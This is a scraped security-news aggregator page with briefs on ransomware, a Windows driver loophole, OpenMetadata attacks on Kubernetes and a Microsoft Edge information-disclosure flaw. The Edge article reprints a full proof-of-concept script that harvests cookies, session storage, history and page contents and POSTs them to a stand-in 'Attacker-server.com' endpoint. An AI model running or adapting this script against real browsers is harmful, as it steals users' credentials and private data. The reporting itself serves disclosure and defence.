Open source tools allow threat actors to exploit a loophole in Microsoft’s kernel driver authentication procedures. Read More
The CyberWire
The all in one place for non-profit security aid.
Open source tools allow threat actors to exploit a loophole in Microsoft’s kernel driver authentication procedures. Read More
The CyberWire
Ransomware hits The Big Issue. Qilin group leaks confidential data
[[{“value”:”The Qilin ransomware group has targeted The Big Issue, a street newspaper sold by the homeless and vulnerable.
Spost on Qilin’s dark web leak site claimed the gang has stolen 550 GB of confidential data from the periodical’s parent company.
Read more in my article on the Hot for Security blog.”}]] Read More
Graham Cluley
PoC Exploit Released for Microsoft Edge Information Disclosure Vulnerability
Cybersecurity researchers have released a Proof-of-Concept (PoC) exploit for a recently disclosed information disclosure vulnerability in Microsoft Edge, the Chromium-based web browser.
The vulnerability, tracked as CVE-2024-30056, could allow unauthorized actors to access private user information, raising concerns about data privacy and security.
The vulnerability, classified as an information disclosure issue, stems from a weakness identified as CWE-359: Exposure of Private Personal Information to an Unauthorized Actor.
Microsoft, the assigning Common Vulnerabilities and Exposures (CVE) Numbering Authority (CNA), has rated the vulnerability’s severity as “Important” with a Common Vulnerability Scoring System (CVSS) score of 7.1 out of 10.
All-in-One Cybersecurity Platform for MSPs to provide full breach protection with a single tool, Watch a Full Demo
The release of the PoC exploit has heightened concerns about the vulnerability’s potential impact.
POC
The exploit demonstrates the feasibility of unauthorized access to private user information, underscoring the need for Microsoft Edge users to take immediate action to mitigate the risk.
<!DOCTYPE html>
<html>
<head>
<title>PoC CVE-2024-30056</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 20px;
}
h1 {
color: #333;
}
pre {
background-color: #f5f5f5;
padding: 10px;
border: 1px solid #ddd;
overflow: auto;
}
button {
padding: 10px 20px;
background-color: #007bff;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<h1> Poc CVE-2024-30056</h1>
<iframe id=”targetIframe” src=”http://localhost/sensitive_page.html” style=”display:none;”></iframe>
<script>
document.getElementById(‘targetIframe’).onload = function() {
try {
let iframeDocument = document.getElementById(‘targetIframe’).contentWindow.document;
let sensitiveData = btoa(encodeURIComponent(escape(iframeDocument.documentElement.innerHTML)));
let cookies = btoa(encodeURIComponent(escape(document.cookie)));
let sessions = btoa(encodeURIComponent(escape(JSON.stringify(sessionStorage))));
let browsingHistory = btoa(encodeURIComponent(escape(JSON.stringify(history))));
let browserData = {
userAgent: navigator.userAgent,
platform: navigator.platform,
language: navigator.language,
plugins: [],
mimeTypes: [],
screen: {
width: window.screen.width,
height: window.screen.height,
colorDepth: window.screen.colorDepth
},
timezoneOffset: new Date().getTimezoneOffset()
};
for (let i = 0; i < navigator.plugins.length; i++) {
browserData.plugins.push({
name: navigator.plugins[i].name,
filename: navigator.plugins[i].filename,
description: navigator.plugins[i].description
});
}
for (let i = 0; i < navigator.mimeTypes.length; i++) {
browserData.mimeTypes.push({
type: navigator.mimeTypes[i].type,
description: navigator.mimeTypes[i].description,
suffixes: navigator.mimeTypes[i].suffixes
});
}
let popup = window.open(“”, “Sensitive Data”, “width=600,height=600”);
popup.document.write(“<h1>Sensitive Data</h1>”);
popup.document.write(“<pr>” + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sensitiveData)))) + “</pr>”));
popup.document.write(“<h2>Cookies:</h2>”);
popup.document.write(“<pre>” + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(cookies)))) + “</pre>”));
popup.document.write(“<h2>User Sessions:</h2>”);
popup.document.write(“<pre>” + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sessions)))) + “</pre>”));
popup.document.write(“<h2>Browsing History:</h2>”);
popup.document.write(“<pre>” + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(browsingHistory)))) + “</pre>”));
popup.document.write(“<h2>Browser Information:</h2>”);
popup.document.write(“<pre>” + JSON.stringify(browserData, null, 2) + “</pre>”);
popup.document.write(“<button onclick=”sendData()”>Send Data </button>”);
function sendData() {
let xhr = new XMLHttpRequest();
xhr.open(“POST”, “http://Attacker-server.com/steal_data”, true);
xhr.setRequestHeader(“Content-Type”, “application/json”);
xhr.send(JSON.stringify({ sensitiveData: sensitiveData, cookies: cookies, sessions: sessions, browsingHistory: browsingHistory }));
alert(“Stolen data has been sent to the malicious server!”);
}
} catch (error) {
console.error(‘Error accessing iframe content:’, error);
}
};
</script>
</body>
</html>
Microsoft has acknowledged the vulnerability and is working on a patch to address the issue.
In the meantime, the company has advised Microsoft Edge users to exercise caution when browsing the web and to ensure their browser is updated to the latest version as soon as a fix becomes available.
This incident reminds us of the importance of staying vigilant and applying security best practices.
Users are encouraged to keep their software up to date, regularly apply security patches, and exercise caution when clicking on links or downloading attachments from untrusted sources.
As more details emerge about the vulnerability and its potential impact, Microsoft Edge users are advised to stay informed and follow the company’s guidance to protect their data and maintain the security of their browsing experience.
Get special offers from ANY.RUN Sandbox. Until May 31, get 6 months of free service or extra licenses. Sign up for free.
The post PoC Exploit Released for Microsoft Edge Information Disclosure Vulnerability appeared first on Cyber Security News.
Kubernetes Clusters Under Attack: Critical OpenMetadata Vulnerabilities Exploited
[[{“value”:”
Microsoft Security recently revealed a sophisticated cyber-attack campaign that targets Kubernetes clusters by exploiting newly discovered vulnerabilities in the OpenMetadata platform.
The attackers have set their sights on Kubernetes workloads, leveraging critical vulnerabilities in the OpenMetadata platform to infiltrate and exploit these systems for cryptomining activities.
OpenMetadata, an open-source platform designed for comprehensive metadata management across various data sources, has become the latest target due to its widespread use and central role in data governance and discovery.
On March 15, 2024, a series of vulnerabilities within the OpenMetadata platform were disclosed, affecting versions prior to 1.3.1.
These vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, pose a significant risk as they allow attackers to bypass authentication mechanisms, enabling unauthorized code execution on containers running the vulnerable OpenMetadata versions.
Microsoft said the attack begins by identifying Kubernetes workloads running OpenMetadata that are exposed to the Internet.
Free Live Webinarfor DIFR/SOC Teams: Securing the Top 3 SME Cyber Attack Vectors – Register Here.
By pinpointing systems running outdated and vulnerable versions of the application, attackers can exploit the vulnerabilities mentioned to gain unauthorized access and execute malicious code within the container environment.
This method of attack not only compromises the integrity and confidentiality of the Kubernetes workloads and allows attackers to utilize the compromised systems for cryptomining activities, thereby siphoning off valuable computing resources for their gain.
In response to this critical threat, Microsoft strongly recommends that all customers review their Kubernetes clusters running OpenMetadata workloads.
It is imperative that these systems be updated to the latest version (1.3.1 or later) to mitigate the risk of exploitation.
If OpenMetadata needs to be accessible on the internet, ensure that secure authentication mechanisms are in place and avoid relying on default login credentials.
To get a list of all the images running in the cluster:
kubectl get pods –all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{“n”}{end}’ | grep ‘openmetadata’
If there is a pod with a vulnerable image, update the image version to the latest version.
Looking to Safeguard Your Company from Advanced Cyber Threats? Deploy TrustNet to Your Radar ASAP.
The post Kubernetes Clusters Under Attack: Critical OpenMetadata Vulnerabilities Exploited appeared first on Cyber Security News.
“}]] Read More
Cyber Security News